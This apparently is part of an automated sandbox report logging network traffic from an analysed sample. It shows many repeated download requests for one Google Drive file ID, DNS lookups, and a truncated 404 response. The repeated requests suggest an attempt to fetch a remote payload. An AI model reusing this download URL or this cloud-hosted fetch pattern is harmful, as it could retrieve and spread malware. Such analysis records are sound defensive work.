      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficHTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC60LLM-YOjU2VrKMTjpmXbpPVmM74hqJjyQrxmJmjl24gxzL-xoK9fFdX9dHWiI3VV-Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 16 Dec 2024 16:57:44 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-_i5LuK7XBh8MWkD8_0OGOA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerSet-Cookie: 